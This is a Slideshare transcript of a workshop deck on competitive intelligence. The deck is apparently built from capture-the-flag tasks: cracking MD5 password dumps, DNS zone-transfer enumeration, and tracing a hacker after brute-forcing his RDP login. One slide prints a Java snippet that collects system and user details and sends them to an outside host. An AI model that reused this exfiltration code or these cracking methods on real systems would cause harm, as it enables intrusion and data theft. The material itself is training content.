Security Hole #11 - Competitive intelligence - Beliaiev

3,402
-1

Published on

Published in: Technology
0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total Views
3,402
On Slideshare
0
From Embeds
0
Number of Embeds
22
Actions
Shares
0
Downloads
7
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide

Security Hole #11 - Competitive intelligence - Beliaiev

  1. 1. Competitive Intelligence – Competitor's Fatality Igor Beliaiev
  2. 2. What is Competitive Intelligence(CI)?
  3. 3. Basic methods
  4. 4. Start is here: goo.gl/ygm51k Інфо ебаут хак The Workshop
  5. 5. Task #1. Intro We know that Mikko Kuttonen is using github. His github for working staff is mikkoKut1 You have to find his password for the home media server(107.170.*.*).
  6. 6. Task #2. Pakistani There is a hacker from Pakistan. He is paid for hunting for a different journalists, that show how things in Ukraine are going on during the revolution. We have some information about his last attacks, so we have to find out what he has done with his victims.
  7. 7. We have some dump with journalist's accounts on times.com. (times.zip) Let's find any password, that he could hack. We know that only one of those accounts got hacked, so we have to find the easiest password. Task #2. Pakistani Hint! Journalist’s passwords are encrypted with MD5 algorithm Hint! You can use MD5 online decoders
  8. 8. Task #3. Archive As you can see, we also have another archive with file zik.doc, which we need, but it's encrypted. We need to read the data from zikua.doc Hint! Look carefully for the files in archives. Are there any common things? Hint! You might also use some tools, which you have got with the tasks. But remember, you don’t have much time.
  9. 9. Task #4. Zik.ua From the previous task we have got information, that there are some important files on torrent server on a*****.zik.ua We need to find the subdomain and torrent server. Hint! DNS-requests might help you Hint! You can try to use AXFR-requests
  10. 10. $1mln/month ValveSoftware.com
  11. 11. Task #5. Find the hacker Finally we managed to find the real IP address of Pakistani hacker, and even bruteforce his RDP password. We started to download his private files, but suddenly connection was lost...forever. We managed to download only one file. Using this file, find the name of the hacker!
  12. 12. Task #5. Find the hacker
  13. 13. • Nickname: johnsmith@athc.biz • Find his place and date of birth Tasks from PHDays
  14. 14. Tasks from PHDays
  15. 15. Tasks from PHDays
  16. 16. Tasks from PHDays
  17. 17. Tasks from PHDays String str1 = System.getProperty("os.name"); String str2 = System.getProperty("user.name"); InetAddress localInetAddress2 = InetAddress.getLocalHost(); InetAddress[] arrayOfInetAddress = InetAddress.getAllByName(localInetAddress2.getCanonicalHostName()); String str3 = arrayOfInetAddress[0].toString(); InetAddress localInetAddress1 = InetAddress.getLocalHost(); String str4 = localInetAddress1.getHostName(); String str5 = toHexString(str4.getBytes()) + toHexString("|".getBytes()) + toHexString(str2.getBytes()) + toHexString("|".getBytes()) + toHexString(str1.getBytes()); if (str5.length() > 63) { str5 = str5.substring(0, 63); } Socket localSocket = new Socket(str5 + paramString2, 80); String str6 = readAll(localSocket); String str7 = "access=true"; if (str6.contains(str7)) { localSocket = new Socket(paramString1 + "/loadsmb.cgi?host=" + str3 + "&file=/", 80);
  18. 18. Tasks from PHDays + WebRTC (net.ipcalf.com)
  19. 19. Tasks from PHDays
  20. 20. ? ?
  1. A particular slide catching your eye?

    Clipping is a handy way to collect important slides you want to go back to later.

×